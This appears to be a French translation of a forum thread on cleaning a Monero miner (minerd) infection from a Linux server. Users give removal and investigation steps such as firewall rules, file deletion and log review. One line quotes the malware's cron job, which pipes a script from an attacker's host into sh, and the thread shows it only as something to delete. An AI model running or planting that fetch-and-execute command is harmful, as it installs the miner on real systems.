J'ai trouvé la solution pour supprimer minerd . J'ai eu la chance de trouver le script réel qui a été utilisé pour infecter mon serveur. Tout ce que j'avais à faire était de supprimer les éléments placés par ce script -
- Sur la suggestion de monkeyoto, j'ai bloqué toutes les communications avec le serveur du pool de minage -
iptables -A INPUT -s xmr.crypto-pool.fr -j DROPetiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP. - Suppression du cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | shà partir de/var/spool/cron/rootet/var/spool/cron/crontabs/root. - Suppression du répertoire
/opt/yam. - Suppression de
/root/.ssh/KHK75NEOiq. - Supprimé les fichiers
/opt/minerdet/opt/KHK75NEOiq33. - A arrêté le processus de minage -
pkill minerd. - Arrêt
lady-service lady stop.
J'ai couru ps -eo pcpu,args --sort=-%cpu | head , top -bn2 |sed -n '7,25'p et ps aux | grep minerd après cela, le logiciel malveillant était introuvable.
Je dois encore comprendre comment il a accédé au système, mais j'ai pu le désactiver de cette façon.
Votre premier objectif est (si vous ne voulez pas réinstaller) de déterminer comment il a réussi à y arriver en premier lieu. Si l'attaquant était rusé, il exécuterait "timestomp" pour modifier les dates des binaires. Vous minimisez SSH ne fait pas grand-chose si vous utilisez une version vulnérable de Wordpress, ou Joomla, ou quelque chose de différent. Par exemple, il y avait un exploit Nagios qui a été utilisé par quelqu'un pour exécuter Minerd. Donc l'objectif... "Déterminer ce qui est en cours d'exécution, pourquoi est-il en cours d'exécution et est-il vulnérable ?"
Deuxièmement, vous souhaitez bloquer toutes les communications vers et depuis le serveur du pool de minage :
iptables -A INPUT -S xmr.crypto-pool.fr -j DROP
Alors, comment déterminez-vous ce qui a été modifié/changé/vulnérable ? Vous devez comprendre votre système. Que fait-il, pourquoi le fait-il et qui a besoin d'y accéder. Je chercherais dans mes crontabs pour voir quoi, si quelque chose commence. Vous pourriez exécuter :service --status-all pour voir quels services sont en cours d'exécution/démarrage, et enquêtez sur ceux-ci. /opt/minerd semble être un fichier, faites la somme de contrôle de ce fichier et vous pouvez créer un script pour rechercher tout ce qui appelle ce fichier ou tout fichier correspondant, par exemple :find / | xargs grep -i minerd ou find / | xargs grep -i CHECKSUM_of_MINERD (Gardez à l'esprit qu'il s'agit d'une manière brutale de rechercher dans les fichiers).
Troisièmement, vérifiez vos journaux. Si vous utilisez un serveur Web, je commencerais par les journaux d'erreurs (error_logs) et rechercherais plusieurs 403 et 404 à partir d'une adresse suivie d'une connexion réussie dans access_log. Vérifiez le chemin qui a été accepté (par exemple 200 :/var/www/nagios_or_something_vulnerable/config.php) et regardez à l'intérieur du répertoire. Il existe de nombreuses approches pour trouver ces informations, mais personne ici ne peut vous donner une réponse complète car nous ne pouvons déduire des informations que sur la base de la quantité limitée d'informations que vous publiez.
"J'ai un fichier nommé minerd qui démarre !" Creusez pour ce fichier. (find /|xargs grep -i minerd ). "Il utilise cette chaîne bizarre !" (find / |xargs grep -i 47TS1NQvebb3Feq ). "Il établit une connexion au port 8080 !" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}' ). "Il se connecte à cette adresse !" (lsof -i | grep xmr.crypto ... Voilà, vous avez maintenant une base de référence des choses que vous pouvez faire.
Le problème est que le mineur est probablement la charge utile de certains (autres) logiciels malveillants, vous ne pouvez donc pas vraiment dire ce qui a été compromis sur le système. Il est possible qu'il n'y ait rien d'autre sur le système et que vous soyez simplement réinfecté chaque fois que vous tuez le mineur.
Alternativement, il existe un processus de gestion/dropper qui a ouvert une porte dérobée sur votre serveur.
Le pari le plus sûr est de recréer le serveur. Mais si vous souhaitez l'analyser, vous pouvez obtenir Sophos Anti-Virus gratuitement sur https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx